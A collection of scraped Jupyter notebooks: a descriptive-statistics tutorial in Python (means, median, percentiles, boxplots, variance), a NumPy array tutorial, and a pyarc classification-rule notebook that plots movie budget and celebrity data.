Let's take a look at a simple plot to describe all of these statistics to us:
## The Boxplot
Also sometimes the Box-and-Whisker plot, this is a great way to visualize a lot of the information our `print_statistics` function displayed. In particular, we can see in one graph
* Median
* 75th percentile (called the third quartile)
* 25th percentile (called the first quartile)
* The reach ($\pm1.5*IQR$), which shows outliers
It does not show the mean, but it can be intuited by looking at the plot. Let's take a look at plots for values and skewed:
```
sns.boxplot(values)
```
A classic uniform distribution: centered about 500, the median goes right down the middle, and the whiskers are evenly spaced. Now let's take a look at the `skewed` list:
```
sns.boxplot(skewed)
```
Looks pretty different? Instead of being centered around 50, it looks like the box is centered around 40. The median is at 27 and much of the box is to the right of it. This shows us that the distribution is skewed to the right.
There's another important way to visualize a distribution and that is
## Histogram
Ah, the moment we've all been waiting for. I keep teaching you ways to describe a dataset, but sometimes a picture is worth a thousand words. That picture is the Histogram.
A histogram is a bar chart in which the values of the dataset are plotted horizontally on the X axis and the _frequencies_ (i.e. how many times that value was seen) are plotted on the Y axis. If you remember our functions to make a counter, a histogram is essentially a chart of those counts.
Think for a minute on what the histogram for our uniform dataset of 10,000 randomly generated numbers would look like? Pretty boring right?
```
# Seaborn gives an easy way to plot histograms. Plotting from scratch is beyond the
# scope of the programming we will do
sns.distplot(values, kde=False, bins=100)
```
Seaborn's helpful `sns.distplot()` method simply turns a dataset into a histogram for us. The `bins` parameter allows us to make bins where instead of the frequency count of each variable, we plot the frequency count of a range of variables. This is very useful when we have continuous distribution (i.e. one that can take an infinite number of values of the range), as plotting every individual value is unfeasible and would make for an ugly graph.
Let's take a look at our skewed data:
```
sns.distplot(skewed, kde=False, bins=100)
```
The data has tons of values around 10, and everything else hovers around 4. This type of distribution is called "unimodal" in that it has one peak, or one "contender" for the mode. Practically, unimodal and bimodal are incredibly common.
I'm going to jump ahead to the next notebooks where we generate and describe different types of these distributions, how they're used, and how to describe them. One of the most basic and fundamental distribution in statistics is the unimodal Normal (or Gaussian) distribution. It's the familiar bell-curve. Let's use a simple, albeit slow, function to generate numbers according to the normal distribution.
```
from math import sqrt, log, cos, sin, pi
def generateGauss():
x1 = random.random() # generate a random float in [0,1.0)
x2 = random.random()
y1 = sqrt(-2 *log(x1)) * cos(2*pi*x2)
y2 = sqrt(-2*log(x1)) * sin(2*pi*x2)
return y1, y2
gaussValues = []
for _ in range(10000):
gaussValues += list(generateGauss())
#Let's take a peek:
gaussValues
# and print our statistics
print_statistics(gaussValues, calc_mode=False)
```
The nature of the function is such that the mean should fall around 0. It looks like we accompished that. Also note how the 25th and 50th percentile are roughly the same number. This is an indication that the distribution is not significantly skewed. Let's take a look at it's histogram:
```
sns.distplot(gaussValues, kde=False)
```
Get used to this image because you will see it _everywhere_ in statistics, data science, and life. Even though there are many many distributions out there (and even more variations on each of those), most people will be happy to apply the "bell curve" to almost anything. Chance are, though, they're right.
## Variability
Let's talk about one more descriptive statistic that describes to us how much the values vary. In other words, if we're looking at test scores, did everyone do about the same? Or were there some big winners and losers?
Mathemeticians call this the _variability_. There are three major measures of variability: range, inter-quartile range (IQR), and variation/standard devaition.
### 1. Range
Range is a very simple measure: how far apart could my values possibly be? In our generated datasets above, the answer was pretty obvious. We generated a random number from 0 to 1000, so the range was $1000-0 = 1000$. The values of x could never go outside of this range.
But what about our gaussian values? The tandard normal distribution has asymptotic end points instead of absolute end points, so it's not so clean. We can see from the graph above that it doesn't look like there are any values above and below 4, so we'd expect a range of something around 8:
```
print("Max: {}\nMin: {}\nRange: {}".format(
max(gaussValues),
min(gaussValues),
max(gaussValues) - min(gaussValues)))
```
Exactly what we expected. In practice, the range is a good descriptive statistic, but you can't do many other interesting things with it. It basically let's you say "our results were between X and Y", but nothing too much more profound.
Another good way to describe the range is called
### 2. Inter-Quartile Range
or IQR for short. This is a similar technique where instead of taking the difference between the max and min values, we take the difference between the 75th and 25th percentile. It gives a good sense of the range because it excludes outliers and tells you where the middle 50% of the values are grouped. Of course, this is most useful when we're looking at a unimodal distribution like our normal distribution, because for a distribution that's bimodal (i.e. has many values at either end of the range), it will be misleading.
Here's how we caluclated it:
```
print("75th: {}\n25th: {}\nIQR: {}".format(
pct_value(gaussValues, .75),
pct_value(gaussValues, .25),
pct_value(gaussValues, .75) - pct_value(gaussValues, .25)
))
```
So again, this tells us that 50% of our values are between -0.68 and 0.68 and all within the same 1.35 values. Comparing this to the range (which is not at all influenced by percentages of values), this gives you the sense that the're bunched around the mean.
If we want a little more predictive power, though, it's time to talk about
### 3. Variance
Variance is a measure of how much values typically deviate (i.e. how far away they are) from the mean.
If we want to calculate the variance, then we first see how far a value is from the mean ($\mu$), square it (which gets rid of the negative), sum them up, and divide by $n$. Essentially, it's an average where the value is the deviation squared instead of the value itself. Here's the formula for variance, denoted by $\sigma^2$:
$$ \sigma^2 = \frac{(x_1 - \mu)^2+(x_2 - \mu)^2+ \cdots + (x_n - \mu)^2}{n} $$
Let's code that up:
```
def variance(vals):
n = len(vals)
m = arithmetic_mean(vals)
variance = 0
for x in vals:
variance += (x - m)**2
return variance/n
variance(gaussValues)
```
The variance four our generated Gaussian numbers is roughly 1, which is another condition of a standard normal distribution (mean is 0, variance is 1). So no surprise. But the variance is a bit of a tricky number to intuit because it is the average of the _squared_ differences between the mean. Take our skewed for example:
```
variance(skewed)
```
How do you interpret this? The max value is 100, so is a variance of 934.8 a lot or a little? Also, let's say the skewed distribution was a measure of price in dollars. Therefore, the units of variance would be 934.8 dollars squared. Doesn't make a whole lot of sense.
For this reason, most people will take the square root of the variance to give them a value called the **standard deviation**: $\sigma = \sqrt{\sigma^2}$.
```
def stddev(vals):
return sqrt(variance(vals))
stddev(skewed)
```
This is much more approchable. It's saying the standard devaition from our mean is \$30. That is an easy number to digest. This is a very important number to be able to grok. I'll repeat it to drive the point home:
The _standard deviation_ is a measure of how "spread out" a distribution is. The higher the value, the further a typical observation from our population is from the mean of that population.
The standard devation, range, and IQR all give measures of this dispersion of a distribution. However, for reasons we will see later, the standard devaition is the work horse of them all. By knowing the standard deviation of a population (or sample, as the case often is), we can begin to judge how likely a value is to get, or how sure we are of our own guesses. Statistics is a glorified guessing game, and stddev is one of the most important tools.
---
## Outlook
Some of the topics in descriptive statistics to look forward to are
* Paired data
* **Scatter plots**
* Explanatory vs response variables
* **Covariance and correlation**
* Random Variables and Probability
* **Distributions**
* Discrete vs Continuous
* Descriptive statistics of distributions
* Major types of distributions
* Normal
* Geometric
* Binomial
* Poisson
* Chi-squared
* Weibull
* **Inferential statistics**
* Sampling distributions and statistics
* Central limit theorem
* Hypothesis testing
|
github_jupyter
|
!pip install seaborn;
!pip install pandas
import seaborn as sns
import random as random
%matplotlib inline
random.seed(42)
values = [random.randrange(1,1001,1) for _ in range(10000)]
values[0:15]
len(values)
sum(values)
sns.stripplot(x=values, jitter=True, alpha=0.2)
sparse_values = [random.randrange(1,1001) for _ in range (200)]
sns.stripplot(x=sparse_values, jitter=True)
print("Max value: {}\nMin value: {}".format(
max(values), min(values)))
sorted_vals = sorted(values)
sorted_vals[0:20]
values.sort()```
## The Mean
The mean is a fancy statistical way to say "average." You're all familiar with what average means. But mathemeticians like to be special and specific. There's not just one type of mean. In fact, we'll talk about 3 kinds of "means" that are all useful for different types of numbers.
1. **Arithmetic mean** for common numbers
2. **Geometric mean** for returns or growth
3. **Harmonic mean** for ratios and rates
### 1. Arithmetic mean
This is your typical average. You've used it all your life. It's simply the sum of the elements divided by the length. Intuitively, think of it as if you made every element the exact same value so that the sum of all values remains the same as before. What would that value be?
Mathematically the mean, denoted $\mu$, looks like:
$$\mu = \frac{x_1 + x_2 + \cdots + x_n}{n}$$
where $\bar{x}$ is our mean, $x_i$ is a value at the $i$th index of our list, and $n$ is the length of that list.
In Python, it's a simple operation combining two builtins we saw above: `sum()` and `len()`
From this we see our average value is 502.1696. Let's double check that with our intuitive definition using the sum:
### 2. Geometric mean
The geometric mean is a similar idea but instead uses the product. It says if I multiply each value in our list together, what one value could I use instead to get the same result?
The geometric mean is very useful in things like growth or returns (e.g. stocks) because adding returns doesn't give us the ability to get returns over a longer length of time. In other words, if I have a stock growing at 5% per year, what will be the total returns after 5 years?
If you said 25%, you are wrong. It would be $1.05^5 - 1 \approx 27.63\%$
Mathematically, our geometric is:
$$ GM(x) = \sqrt[n]{x_1 \times x_2 \times \cdots \times x_n }$$
Using our `product` function above, we can easily multiply all the values together to get what your return after 4 years is:
or roughly $17.8\%$. Using our geometric mean should give us the same result:
Now look at what happens with the arithmetic mean:
The arithmetic mean would tell us that after 4 years, we should have an $18.1\%$ return. But we know it should actually be a $17.8\%$ return. It can be tricky to know when to use the arithmetic and geometric means. You also must remember to add the $1$ to your returns or it will not mathematically play nice.
### 3. Harmonic mean
This one is also a bit tricky to get intuitively. Here we want an average of _rates_. Not to be confused with an average of _returns_. Recall a rate is simply a ratio between two quantities, like the price-to-earnings ratio of a stock or miles-per-hour of a car.
Let's take a look at the mph example. If I have a car who goes 60mph for 50 miles, 50mph for another 50, and 40mph for yet another 50, then the car has traveled 150 miles in $\frac{50mi}{60\frac{mi}{h}} + \frac{50mi}{50\frac{mi}{h}} + \frac{50mi}{40\frac{mi}{h}} = 3.08\bar{3}h$. This corresponds to a geometric mean of $150mi \div 3.08\bar{3}h \approx 48.648mph$. Much different from our arithmetic mean of 50mph.
(_Note: if in our example the car did not travel a clean 50 miles for every segment, we have to use a_ [weighted harmonic mean](https://en.wikipedia.org/wiki/Harmonic_mean#Weighted_harmonic_mean).)
Mathematically, the harmonic mean looks like this:
$$ \frac{n}{\frac{1}{x_1}+\frac{1}{x_2}+\cdots+\frac{1}{x_n}} $$
So let's code that up:
Now you know about the three [Pythagorean means](https://en.wikipedia.org/wiki/Pythagorean_means). Let's now move on to something very important in descriptive statistics:
## The Median
The median should be another familiar statistic, but often misquoted. When somebody is describing a set of numbers with just a mean, they might not be telling the whole story. For example, many sets of values are _skewed_ (a concept we will cover in the histogram section) in that most values are clustered around a certain area but have a long tail. Prices are usually good examples of this. Most wine is around \\$15-20, but we've all seen those super expensive bottles from a hermit's chateau in France. Salaries are also skewed (and politicians like to remind us how far skewed just 1\% of these people are).
A useful statistic in these cases is the "median." The median gives us the middle value, as opposed to the average value. Here's a simple, but illustrative example:
Suppose we take the salaries of 5 people at a bar
[12000, 48000, 72000, 160000, 3360000]
If I told you the average salary in this bar right now is \\$730,400, I'd be telling you the truth. But you can tell that our rich friend pulling in over 3 million is throwing off the curve. When he goes home early to do a business, the average drops to just \\$73,000. _A full 10 times less_.
The median instead in this case is much more consistent, or in other words, not as prone to _outliers._ To find the median, we simply take the middle value. Or if there are an even number of entries, we take the average of the two middle values. Here it is in Python:
A much more reasonable \$7200! Now let's see what happens when Moneybags goes home:
The median drops down to \\$60,000 (which is the average of \\$48,000 and \\$72,000).
Let's take a look at our original `values` list of 10,000 numbers.
Above we used the [`Counter`](https://docs.python.org/3.6/library/collections.html#collections.Counter) class in the standard library. This class is a subclass of the `dict` that holds a dictionary of keys to their counts. We can build our own version of it like so:
Remember this part because it will show up very soon when we talk about histograms, *the chef's knife of a data scientist's data exploration kitchen*. But first, there's one more descriptive statistic that we should cover.
## The Mode
The mode is simply the most common element. If there are multiple elements with the same count, then there are two modes. If all elements have the same count, there are no modes. If the distribution is _continuous_ (meaning it can take uncountably infinite values, which we will discuss in the Distributions chapter), then we use ranges of values to determine the mode. Honestly, I don't really find the mode too useful. A good time to use it is if there's a lot of _categorical data_ (meaning values like "blue", "red", "green" instead of _numerical data_ like 1,2,3). You might want to know what color car your dealership has the most of.
Let's take a look at that example now. I've built a set of cars with up to 20 cars of any of four colors.
But that's enough about modes. Check out wikipedia if you want more because there's no point spending more time on them then they're worth.
Hang in there, because we're getting close. Still to come is Percentiles, Boxplots, and Histograms. Three very import things.
## Percentiles
A percentile is familiar to anyone who has taken the SAT. It answers the question: what percentage of students are dumber than I am? Well the College Board would love to tell you: congratulations, you're in the 92nd percentile!
Let's take a look at our old friend Mr. `values` with 10,000 numbers from 1-1000. Since this list is _uniformly distributed_, meaning every value is as likely to occur as any other, we expect that 25% of the numbers to be below 250, 50% to be below 500, and 75% to be below 750. Let's verify:
Just like we'd expect. Now if the data set is not so nice and uniform, we expect these values to be quite different. Let's write a function to give us an element at a particular percentile:
Notice how the element at the 50th percentile is also our median! Now we have a second definition of the median.
Let's take a look now at a highly skewed set. It will range from 0-100 but we'll cluster it around 10
A few clues that this distribution is skewed:
* The mean is significantly different from the median
* The percentiles cluster around 25. A uniform distribution we'd expect 25, 50, and 75 for our percentiles.
* The max i smuch higher than the mean, median, or even 75th percentile.
Let's take a look at a simple plot to describe all of these statistics to us:
## The Boxplot
Also sometimes the Box-and-Whisker plot, this is a great way to visualize a lot of the information our `print_statistics` function displayed. In particular, we can see in one graph
* Median
* 75th percentile (called the third quartile)
* 25th percentile (called the first quartile)
* The reach ($\pm1.5*IQR$), which shows outliers
It does not show the mean, but it can be intuited by looking at the plot. Let's take a look at plots for values and skewed:
A classic uniform distribution: centered about 500, the median goes right down the middle, and the whiskers are evenly spaced. Now let's take a look at the `skewed` list:
Looks pretty different? Instead of being centered around 50, it looks like the box is centered around 40. The median is at 27 and much of the box is to the right of it. This shows us that the distribution is skewed to the right.
There's another important way to visualize a distribution and that is
## Histogram
Ah, the moment we've all been waiting for. I keep teaching you ways to describe a dataset, but sometimes a picture is worth a thousand words. That picture is the Histogram.
A histogram is a bar chart in which the values of the dataset are plotted horizontally on the X axis and the _frequencies_ (i.e. how many times that value was seen) are plotted on the Y axis. If you remember our functions to make a counter, a histogram is essentially a chart of those counts.
Think for a minute on what the histogram for our uniform dataset of 10,000 randomly generated numbers would look like? Pretty boring right?
Seaborn's helpful `sns.distplot()` method simply turns a dataset into a histogram for us. The `bins` parameter allows us to make bins where instead of the frequency count of each variable, we plot the frequency count of a range of variables. This is very useful when we have continuous distribution (i.e. one that can take an infinite number of values of the range), as plotting every individual value is unfeasible and would make for an ugly graph.
Let's take a look at our skewed data:
The data has tons of values around 10, and everything else hovers around 4. This type of distribution is called "unimodal" in that it has one peak, or one "contender" for the mode. Practically, unimodal and bimodal are incredibly common.
I'm going to jump ahead to the next notebooks where we generate and describe different types of these distributions, how they're used, and how to describe them. One of the most basic and fundamental distribution in statistics is the unimodal Normal (or Gaussian) distribution. It's the familiar bell-curve. Let's use a simple, albeit slow, function to generate numbers according to the normal distribution.
The nature of the function is such that the mean should fall around 0. It looks like we accompished that. Also note how the 25th and 50th percentile are roughly the same number. This is an indication that the distribution is not significantly skewed. Let's take a look at it's histogram:
Get used to this image because you will see it _everywhere_ in statistics, data science, and life. Even though there are many many distributions out there (and even more variations on each of those), most people will be happy to apply the "bell curve" to almost anything. Chance are, though, they're right.
## Variability
Let's talk about one more descriptive statistic that describes to us how much the values vary. In other words, if we're looking at test scores, did everyone do about the same? Or were there some big winners and losers?
Mathemeticians call this the _variability_. There are three major measures of variability: range, inter-quartile range (IQR), and variation/standard devaition.
### 1. Range
Range is a very simple measure: how far apart could my values possibly be? In our generated datasets above, the answer was pretty obvious. We generated a random number from 0 to 1000, so the range was $1000-0 = 1000$. The values of x could never go outside of this range.
But what about our gaussian values? The tandard normal distribution has asymptotic end points instead of absolute end points, so it's not so clean. We can see from the graph above that it doesn't look like there are any values above and below 4, so we'd expect a range of something around 8:
Exactly what we expected. In practice, the range is a good descriptive statistic, but you can't do many other interesting things with it. It basically let's you say "our results were between X and Y", but nothing too much more profound.
Another good way to describe the range is called
### 2. Inter-Quartile Range
or IQR for short. This is a similar technique where instead of taking the difference between the max and min values, we take the difference between the 75th and 25th percentile. It gives a good sense of the range because it excludes outliers and tells you where the middle 50% of the values are grouped. Of course, this is most useful when we're looking at a unimodal distribution like our normal distribution, because for a distribution that's bimodal (i.e. has many values at either end of the range), it will be misleading.
Here's how we caluclated it:
So again, this tells us that 50% of our values are between -0.68 and 0.68 and all within the same 1.35 values. Comparing this to the range (which is not at all influenced by percentages of values), this gives you the sense that the're bunched around the mean.
If we want a little more predictive power, though, it's time to talk about
### 3. Variance
Variance is a measure of how much values typically deviate (i.e. how far away they are) from the mean.
If we want to calculate the variance, then we first see how far a value is from the mean ($\mu$), square it (which gets rid of the negative), sum them up, and divide by $n$. Essentially, it's an average where the value is the deviation squared instead of the value itself. Here's the formula for variance, denoted by $\sigma^2$:
$$ \sigma^2 = \frac{(x_1 - \mu)^2+(x_2 - \mu)^2+ \cdots + (x_n - \mu)^2}{n} $$
Let's code that up:
The variance four our generated Gaussian numbers is roughly 1, which is another condition of a standard normal distribution (mean is 0, variance is 1). So no surprise. But the variance is a bit of a tricky number to intuit because it is the average of the _squared_ differences between the mean. Take our skewed for example:
How do you interpret this? The max value is 100, so is a variance of 934.8 a lot or a little? Also, let's say the skewed distribution was a measure of price in dollars. Therefore, the units of variance would be 934.8 dollars squared. Doesn't make a whole lot of sense.
For this reason, most people will take the square root of the variance to give them a value called the **standard deviation**: $\sigma = \sqrt{\sigma^2}$.
| 0.816991 | 0.989223 |
# Numpy
Numpy (Numerical Python) is an open-source library in Python for performing scientific computations. It lets us work with arrays and matrices in a more natural way unlike lists, wherein we have to loop through individual elements to perform a numerical operation.
As a refresher, here are basic descriptions of arrays and matrices:
- Arrays are simply a collection of values of same type indexed by integers--think of list
- Matrices are defined to be multi-dimensional array indexed by rows, columns and dimensions--think of nested lists
When doing mathematical operations, usage of Numpy library is highly recommended because it is designed with high performance in mind--Numpy is largely written in C which makes computations much faster than just using Python code. In addition, Numpy arrays are stored more efficiently than an equivalent data structure in Python such as lists and arrays.
Numpy is a third-party module, which means it is not part of Python's suite of built-in libraries. You don't have to worry about this since this is already in the environment we have set up for you.
**Import**
To use numpy, we have to import it first.
```
import numpy as np
```
`as` keyword allows us to create an alias for our imported library. In this case, we renamed `numpy` to `np`. This is a common naming convention for numpy. You'll see almost all implementations using numpy on the web using this alias.
We can also do the following to check its version.
```
print(np.__version__)
```
**Numpy Array Basics**
Some notes on numpy arrays:
- all elements in a numpy array must be of the same type.
- the size cannot be changed once construced.
- support โvectorizedโ operations such as element-wise addition and multiplication.
## 1. Attributes
Numpy has built-in attributes that we can use. Here are some of them:
- ndarray.ndim - number of axes or dimensions of the array.
- ndarray.shape - the dimension of the array--a tuple of integers indicating the size of the array in each dimension.
- ndarray.dtype - the type of the elements in the array. Numpy provides its own `int16`, `int32`, `float64` data types, among others.
- ndarray.itemsize - size in bytes of each element of the array. For example an array of elements of type `float64` has itemsize of $\frac{64}{8} = 8$ and `complex32` has item size of $\frac{32}{8} = 4$.
```
arr = np.array([1, 2, 3, 4], dtype=float)
print('Type: ',type(arr))
print('Shape: ',arr.shape)
print('Dimension: ',arr.ndim)
print('Itemsize: ',arr.itemsize)
print('Size: ',arr.size)
```
**Mixed data types**
If we try to construct a numpy array from a list with mixed data types, it will automatically treat them as strings. But if we force it into a certain numeric data type, say float32, it will cause an error.
```
arr = np.array([1, 2.0, "dsi"]) # notice that we did not pass an argument to dtype parameter
print("Datatype: ", arr.dtype)
```
## 2. Creating Arrays
The following are different ways of creating an array in Numpy aside from passing a list as seen in the examples above.
**np.arange**
arange creates an array based on the arguments passed. If only a single argument is passed--let's call this `n1`, it creates an array of size `n1` starting from 0 to `n1`-1. If two arguments (`n1` and `n2`) are passed, it creates an array starting from `n1` to `n2`-1.
```
np.arange(5, dtype=float)
np.arange(2, 5, dtype=float)
```
**np.ones** and **np.zeros**
Creates an array of 0s and 1s
```
np.ones(4)
np.zeros(4)
```
**np.linspace**
Creates an array having values of equal intervals.
```
np.linspace(1, 10, 10, dtype=float)
np.linspace(1, 10, 4, dtype=float)
```
**np.ones_like** and **np.zeros_like**
Creates an array of 0s and 1s based on input array/matrix.
```
arr = np.array([[1, 2, 3], [4, 5, 6]])
np.ones_like(arr)
np.zeros_like(arr)
```
**np.diag**
Creates a diagonal array
```
arr = [1, 5, 4]
np.diag(arr)
```
**np.random**
Creates an array/matrix of random values.
```
np.random.randint(0, 10, size=(2, 3)) # matrix with dimension 2x3 containing integer values ranging from 0-9
np.random.random(size=(2, 3)) # matrix with dimension 2x3 containing float values ranging from 0-1
```
## 3. Accessing and Manipulating Arrays
Numpy allows us to do manipulations on an array/matrix.
**Indexing** and **Slicing**
This is similar to how you index/slice a list.
```
arr = np.arange(3, 10)
arr[6]
arr[:4]
```
We can also indicate the number of steps by adding another colon `:` and an integer number after the slice syntax.
```
arr[:4:2]
```
**Reshaping**
To reshape a matrix in Numpy, we use the `reshape()` method. It accepts a tuple indication the new dimensions of the matrix after transformation.
```
arr = np.arange(10)
arr.reshape(5, 2)
arr.reshape(2, 5)
```
**Concatenating**
We use the following methods in Numpy to do concatenation:
- `np.concatenate()` - joins 1-dimensional arrays
- `np.hstack()` - joins multi-dimensional arrays on the horizontal axis
- `np.vstack()` - joins multi-dimensional arrays on the vertical axis
```
arr1 = np.arange(5)
arr2 = np.arange(5, 10)
arr3 = np.arange(10, 15)
np.concatenate([arr1, arr2])
np.concatenate([arr1, arr2, arr3])
arr1 = np.random.random((2,1))
arr2 = np.random.random((2,3))
print('Array 1:\n', arr1)
print('Array 2:\n', arr2)
np.hstack([arr1, arr2])
arr1 = np.random.random((1,2))
arr2 = np.random.random((4,2))
print('Array 1:\n', arr1)
print('Array 2:\n', arr2)
np.vstack([arr1, arr2])
```
**Splitting**
This is just the opposite of the concatenation methods we've seen earlier. The following are the methods we use for doing such:
- `np.split()` - splits a 1-dimensional array. The first argument is the array we want to split. The second argument is a tuple of indices where we want the array to be split.
- `np.hsplit()` - splits a multi-dimensional array on the horizontal axis
- `np.vsplit()` - splits a multi-dimensional array on the vertical axis
```
arr = np.arange(10)
np.split(arr, (1, 3, 6))
arr = np.arange(20)
np.split(arr, (1, 10))
arr = np.random.random((6,5))
arr
arr1, arr2 = np.hsplit(arr, [2])
print('Split 1:\n', arr1)
print('Split 2:\n', arr2)
arr1, arr2, arr3 = np.vsplit(arr, [1,3])
print('Split 1:\n', arr1)
print('Split 2:\n', arr2)
print('Split 3:\n', arr3)
```
## 4. Matrix Operations
### 4.1 Arithmetic Operations
We can perform arithmetic operations using on Numpy matrices like in linear algebra. Be careful of the dimensions! Make sure that there is no mismatch for a particular operation that you will be using.
```
arr1 = np.arange(9).reshape((3,3))
arr2 = np.ones(9).reshape((3,3))
arr1 + arr2
arr1 - arr2
arr1 * arr2 # note that this is an element-wise multiplication
arr1 / arr2 # note that this is an element-wise division
```
To do a proper matrix multiplication, we use the `np.dot` method.
```
np.dot(arr1, arr2)
```
### 4.2 Broadcasting
Broadcasting allows us to perform an arithmetic operation to a whole matrix using a scalar value. For example:
```
arr = np.arange(9).reshape((3,3))
arr
arr + 5
```
Notice that all the elements in the array have increased by 5. We can also do this for other arithmetic operations.
```
arr - 5
arr * 5
arr / 5
```
We can also broadcast using 1-d array .
```
arr1 = np.arange(12).reshape((4,3))
arr2 = np.ones(3)/2 # we broadcast using a scalar value of 2.
arr1
arr2
arr1 - arr2
arr1 * arr2
```
### 4.3 Other functions
Here are other useful methods that we typically use:
**Transpose**
This flips the original matrix
```
arr = np.arange(12).reshape((4,3))
arr
arr.T
```
**Aggregation methods**
We can use methods like sum, max, min, and std.
```
arr = np.arange(12).reshape((4,3))
arr.sum()
```
We can also specify which dimension to use for the aggregation.
```
arr.sum(axis=0)
arr.sum(axis=1)
arr.max()
arr.max(axis=0)
arr.min()
arr.std()
arr.std(axis=1)
```
|
github_jupyter
|
import numpy as np
print(np.__version__)
arr = np.array([1, 2, 3, 4], dtype=float)
print('Type: ',type(arr))
print('Shape: ',arr.shape)
print('Dimension: ',arr.ndim)
print('Itemsize: ',arr.itemsize)
print('Size: ',arr.size)
arr = np.array([1, 2.0, "dsi"]) # notice that we did not pass an argument to dtype parameter
print("Datatype: ", arr.dtype)
np.arange(5, dtype=float)
np.arange(2, 5, dtype=float)
np.ones(4)
np.zeros(4)
np.linspace(1, 10, 10, dtype=float)
np.linspace(1, 10, 4, dtype=float)
arr = np.array([[1, 2, 3], [4, 5, 6]])
np.ones_like(arr)
np.zeros_like(arr)
arr = [1, 5, 4]
np.diag(arr)
np.random.randint(0, 10, size=(2, 3)) # matrix with dimension 2x3 containing integer values ranging from 0-9
np.random.random(size=(2, 3)) # matrix with dimension 2x3 containing float values ranging from 0-1
arr = np.arange(3, 10)
arr[6]
arr[:4]
arr[:4:2]
arr = np.arange(10)
arr.reshape(5, 2)
arr.reshape(2, 5)
arr1 = np.arange(5)
arr2 = np.arange(5, 10)
arr3 = np.arange(10, 15)
np.concatenate([arr1, arr2])
np.concatenate([arr1, arr2, arr3])
arr1 = np.random.random((2,1))
arr2 = np.random.random((2,3))
print('Array 1:\n', arr1)
print('Array 2:\n', arr2)
np.hstack([arr1, arr2])
arr1 = np.random.random((1,2))
arr2 = np.random.random((4,2))
print('Array 1:\n', arr1)
print('Array 2:\n', arr2)
np.vstack([arr1, arr2])
arr = np.arange(10)
np.split(arr, (1, 3, 6))
arr = np.arange(20)
np.split(arr, (1, 10))
arr = np.random.random((6,5))
arr
arr1, arr2 = np.hsplit(arr, [2])
print('Split 1:\n', arr1)
print('Split 2:\n', arr2)
arr1, arr2, arr3 = np.vsplit(arr, [1,3])
print('Split 1:\n', arr1)
print('Split 2:\n', arr2)
print('Split 3:\n', arr3)
arr1 = np.arange(9).reshape((3,3))
arr2 = np.ones(9).reshape((3,3))
arr1 + arr2
arr1 - arr2
arr1 * arr2 # note that this is an element-wise multiplication
arr1 / arr2 # note that this is an element-wise division
np.dot(arr1, arr2)
arr = np.arange(9).reshape((3,3))
arr
arr + 5
arr - 5
arr * 5
arr / 5
arr1 = np.arange(12).reshape((4,3))
arr2 = np.ones(3)/2 # we broadcast using a scalar value of 2.
arr1
arr2
arr1 - arr2
arr1 * arr2
arr = np.arange(12).reshape((4,3))
arr
arr.T
arr = np.arange(12).reshape((4,3))
arr.sum()
arr.sum(axis=0)
arr.sum(axis=1)
arr.max()
arr.max(axis=0)
arr.min()
arr.std()
arr.std(axis=1)
| 0.324021 | 0.993235 |
```
%run ../../main.py
%matplotlib inline
from pyarc import CBA
from pyarc.algorithms import generateCARs, M1Algorithm, M2Algorithm
from pyarc.algorithms import createCARs
import matplotlib.pyplot as plt
import matplotlib.patches as patches
from itertools import combinations
import itertools
import pandas as pd
import numpy
import re
movies = pd.read_csv("../data/movies.csv", sep=";")
movies_discr = movies.copy(True)
budget_bins = range(0, 350, 50)
budget_bins_names = [ "<{0};{1})".format(i, i + 50) for i in budget_bins[:-1] ]
celebrities_bins = range(0, 10, 2)
celebrities_bins_names = [ "<{0};{1})".format(i, i + 2) for i in celebrities_bins[:-1] ]
movies_discr['estimated-budget'] = pd.cut(movies['estimated-budget'], budget_bins, labels=budget_bins_names)
movies_discr['a-list-celebrities'] = pd.cut(movies['a-list-celebrities'], celebrities_bins, labels=celebrities_bins_names)
movies_discr.to_csv("../data/movies_discr.csv", sep=";")
transactionDB = TransactionDB.from_DataFrame(movies_discr, unique_transactions=True)
rules = generateCARs(transactionDB, support=5, confidence=50)
movies_vals = movies.get_values()
x = range(0, 350, 50)
y = range(1, 9)
x_points = list(map(lambda n: n[0], movies_vals))
y_points = list(map(lambda n: n[1], movies_vals))
data_class = list(movies['class'])
appearance = {
'box-office-bomb': ('brown', "o"),
'main-stream-hit': ('blue', "o"),
'critical-success': ('green', "o")
}
rule_appearance = {
'box-office-bomb': 'tan',
'main-stream-hit': 'aqua',
'critical-success': 'lightgreen'
}
plt.style.use('seaborn-white')
rules
len(transactionDB)
def plot_rule(qrule, plt):
interval_regex = "(?:<|\()(\d+(?:\.(?:\d)+)?);(\d+(?:\.(?:\d)+)?)(?:\)|>)"
lower_y = 0
area_y = celebrities_bins[-1]
lower_x = 0
area_x = budget_bins[-1]
antecedent = qrule.new_antecedent
if len(antecedent) != 0:
if antecedent[0][0] == "a-list-celebrities":
y = antecedent[0]
y_boundaries = re.search(interval_regex, y[1].string())
lower_y = float(y_boundaries.group(1))
upper_y = float(y_boundaries.group(2))
area_y = upper_y - lower_y
axis = plt.gca()
else:
x = antecedent[0]
x_boundaries = re.search(interval_regex, x[1].string())
lower_x = float(x_boundaries.group(1))
upper_x = float(x_boundaries.group(2))
area_x = upper_x - lower_x
if len(antecedent) > 1:
if antecedent[1][0] == "a-list-celebrities":
y = antecedent[0]
y_boundaries = re.search(interval_regex, y[1].string())
lower_y = float(y_boundaries.group(1))
upper_y = float(y_boundaries.group(2))
area_y = upper_y - lower_y
axis = plt.gca()
else:
x = .antecedent[1]
x_boundaries = re.search(interval_regex, x[1].string())
lower_x = float(x_boundaries.group(1))
upper_x = float(x_boundaries.group(2))
area_x = upper_x - lower_x
axis = plt.gca()
class_name = qrule.rule.consequent[1]
axis.add_patch(
patches.Rectangle((lower_x, lower_y), area_x, area_y, zorder=-2, facecolor=rule_appearance[class_name], alpha=rule.confidence)
)
plt.figure(figsize=(10, 5))
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
plt.xlabel('Estimated Budget (1000$)', fontsize=20)
plt.ylabel('A-List Celebrities', fontsize=20)
plt.savefig("../data/datacases.png")
print("rule count", len(rules))
movies_discr.head()
plt.figure(figsize=(10, 5))
# data cases
for i in range(len(x_points)):
plt.scatter(x_points[i], y_points[i], marker=appearance[data_class[i]][1], color=appearance[data_class[i]][0], s=60)
# rule boundary lines
for i, n in enumerate(x):
plt.axhline(y=y[i], color = "grey", linestyle="dashed")
plt.axvline(x=x[i], color = "grey", linestyle="dashed")
plt.xlabel('Estimated Budget (1000$)', fontsize=20)
plt.ylabel('A-List Celebrities', fontsize=20)
plt.savefig("../data/datacases_discr.png")
print("rule count", len(rules))
from matplotlib2tikz import save as tikz_save
subplot_count = 1
